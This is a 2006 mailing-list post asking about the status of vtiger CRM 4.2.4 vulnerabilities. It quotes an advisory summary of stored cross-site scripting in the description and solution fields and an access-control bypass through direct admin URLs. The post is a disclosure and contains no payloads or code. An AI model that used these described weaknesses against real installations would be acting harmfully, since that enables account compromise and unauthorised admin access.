[prev in list] [next in list] [prev in thread] [next in thread] 

List:       vtigercrm-developers
Subject:    [Vtigercrm-developers] New Vulnerability in vtiger CRM 4.2.4 ->
From:       kim () haverblad ! se (Kim Haverblad)
Date:       2006-09-28 17:14:12
Message-ID: 451C02E4.8030507 () haverblad ! se
[Download RAW message or body]

Just wondering, but what is status on this vulnerability?

/Kim

Kim Haverblad wrote:
> New vulnerability has been posted by Ivan Markovic regarding Cross Site
> Scripting, Security Bypass and Remote Command Execution.
> 
> Original advisory:
> http://www.security-net.biz/adv/D3906a.txt
> 
> Secunia advisory:
> http://secunia.com/advisories/21728/
> 
> Description:
> Ivan Markovic has discovered some vulnerabilities in vtiger CRM, which
> can be exploited by malicious people to conduct script insertion attacks
> and bypass certain security restrictions.
> 
> 1) Input passed to the "description" field in various modules when e.g.
> creating a contact and the "solution" field when an administrator
> modifies the solution in the HelpDesk modules isn't properly sanitised
> before being used. This can be exploited to inject arbitrary HTML and
> script code, which will be executed in a user's browser session in
> context of an affected site when the malicious user data is viewed.
> 
> 2) An error in the access control verification can be exploited by a
> normal user to access administrative modules (e.g. the settings section)
> by accessing certain URLs directly.
> 
> The vulnerabilities have been confirmed in version 4.2.4. Other versions
> may also be affected.
> 
> Solution:
> Edit the source code to ensure that input is properly sanitised and that
> access to administrative modules are properly checked.
> 
> Use another product.
> _______________________________________________
> Get started with creating presentations online - http://zohoshow.com?vt 
> 
> __________ NOD32 1.1738 (20060904) Information __________
> 
> This message was checked by NOD32 antivirus system.
> http://www.eset.com
> 
> 
> 

[prev in list] [next in list] [prev in thread] [next in thread]